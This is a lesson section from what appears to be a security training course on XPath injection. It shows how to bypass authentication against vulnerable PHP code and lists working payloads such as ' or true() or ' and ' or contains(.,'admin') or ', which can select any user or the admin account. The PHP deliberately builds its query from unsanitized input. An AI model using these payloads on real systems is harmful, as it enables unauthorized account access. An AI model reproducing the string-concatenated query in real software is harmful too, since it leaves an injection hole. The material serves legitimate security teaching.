Injection Attacks  

  1. Page 3
  2. XPath - Authentication Bypass

XPath - Authentication Bypass

Now that we have a basic idea of XPath query syntax let us start with XPath injection. XPath injections, similar to SQL injections, can be weaponized to bypass web authentication. We will discuss such a scenario in this section.

Foundation

Before jumping into discovering and exploiting authentication bypasses via XPath injection, we first need to discuss how authentication via XPath queries may be implemented. As an example, let us consider an XML document that stores user data like this:

<users>
	<user>
		<name first="Kaylie" last="Grenvile"/>
		<id>1</id>
		<username>kgrenvile</username>
		<password>P@ssw0rd!</password>
	</user>
	<user>
		<name first="Admin" last="Admin"/>
		<id>2</id>
		<username>admin</username>
		<password>admin</password>
	</user>
	<user>
		<name first="Academy" last="Student"/>
		<id>3</id>
		<username>htb-stdnt</username>
		<password>Academy_student!</password>
	</user>
</users>

To perform authentication, the web application might execute an XPath query like the following:

/users/user[username/text()='htb-stdnt' and password/text()='Academy_student!']

Vulnerable PHP code inserts the username and password without prior sanitization into the query:

$query = "/users/user[username/text()='" . $_POST['username'] . "' and password/text()='" . $_POST['password'] . "']";
$results = $xml->xpath($query);

We aim to bypass authentication by injecting a username and password such that the XPath query always evaluates to true. We can achieve this by injecting the value ' or '1'='1 as username and password. The resulting XPath query looks like this:

/users/user[username/text()='' or '1'='1' and password/text()='' or '1'='1']

Since the predicate evaluates to true, the query returns all user element nodes from the XML document. Therefore, we are logged in as the first user. In our example document, this is the user kgrenvile. However, what if we want to log in as the admin user to obtain the highest permissions? In that case, we have to inject a username of admin' or '1'='1 and an arbitrary value for the password. That way, the resulting XPath query looks like this:

/users/user[username/text()='admin' or '1'='1' and password/text()='abc']

Due to the or clause, the above query will log us in as the admin user without providing the correct password.

Exploitation

In real-world scenarios, passwords are often hashed. Additionally, we might not know a valid username, therefore, we cannot use the abovementioned payloads. Fortunately, we can use more advanced injection payloads to bypass authentication in such cases. Consider the following example:

<users>
	<user>
		<name first="Kaylie" last="Grenvile"/>
		<id>1</id>
		<username>kgrenvile</username>
		<password>8a24367a1f46c141048752f2d5bbd14b</password>
	</user>
	<user>
		<name first="Admin" last="Admin"/>
		<id>2</id>
		<username>obfuscatedadminuser</username>
		<password>21232f297a57a5a743894a0e4a801fc3</password>
	</user>
	<user>
		<name first="Academy" last="Student"/>
		<id>3</id>
		<username>htb-stdnt</username>
		<password>295362c2618a05ba3899904a6a3f5bc0</password>
	</user>
</users>

In this case, the vulnerable PHP code may look like this:

$query = "/users/user[username/text()='" . $_POST['username'] . "' and password/text()='" . md5($_POST['password']) . "']";
$results = $xml->xpath($query);

Since the password is hashed before being inserted into the query, injecting a username and password of ' or '1'='1 will result in the following query:

/users/user[username/text()='' or '1'='1' and password/text()='59725b2f19656a33b3eed406531fb474']

This query does not return any nodes, thus, we cannot bypass authentication this way. Since we also do not know any valid username, we cannot bypass authentication with the payloads discussed so far.

Firstly, we can inject a double or clause in the username to make the XPath query return true, thereby returning all user nodes such that we log in as the first user. An example payload would be ' or true() or ' resulting in the following query:

/users/user[username/text()='' or true() or '' and password/text()='59725b2f19656a33b3eed406531fb474']

Due to the way the query is evaluated, the double or results in a universal true returned by the query, so we bypass the authentication. However, just like discussed previously, we might want to log in as a specific user to obtain more privileges.

One way to do this is to iterate over all users by their position. This can be achieved with the following payload: ' or position()=2 or ', resulting in the following query:

/users/user[username/text()='' or position()=2 or '' and password/text()='59725b2f19656a33b3eed406531fb474']

This will return only the second user node. We can increment the position to iterate over all users until we find the user we seek. There might be millions of users in real-world deployments, thus, this manual technique will become infeasible very quickly. Instead, we can search for specific users if we know part of the username. For this, consider the following payload: ' or contains(.,'admin') or ', resulting in the following query:

/users/user[username/text()='' or contains(.,'admin') or '' and password/text()='59725b2f19656a33b3eed406531fb474']

This query returns all user nodes that contain the string admin in any descendants. Since the username node is a child of the user node, this returns all users that contain the substring admin in the username.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Click here to spawn the target system!

Target: Click here to spawn the target system!

Authenticate to with user "htb-stdnt" and password "Academy_student!"

+10 Streak pts

Previous

+10 Streak pts

Next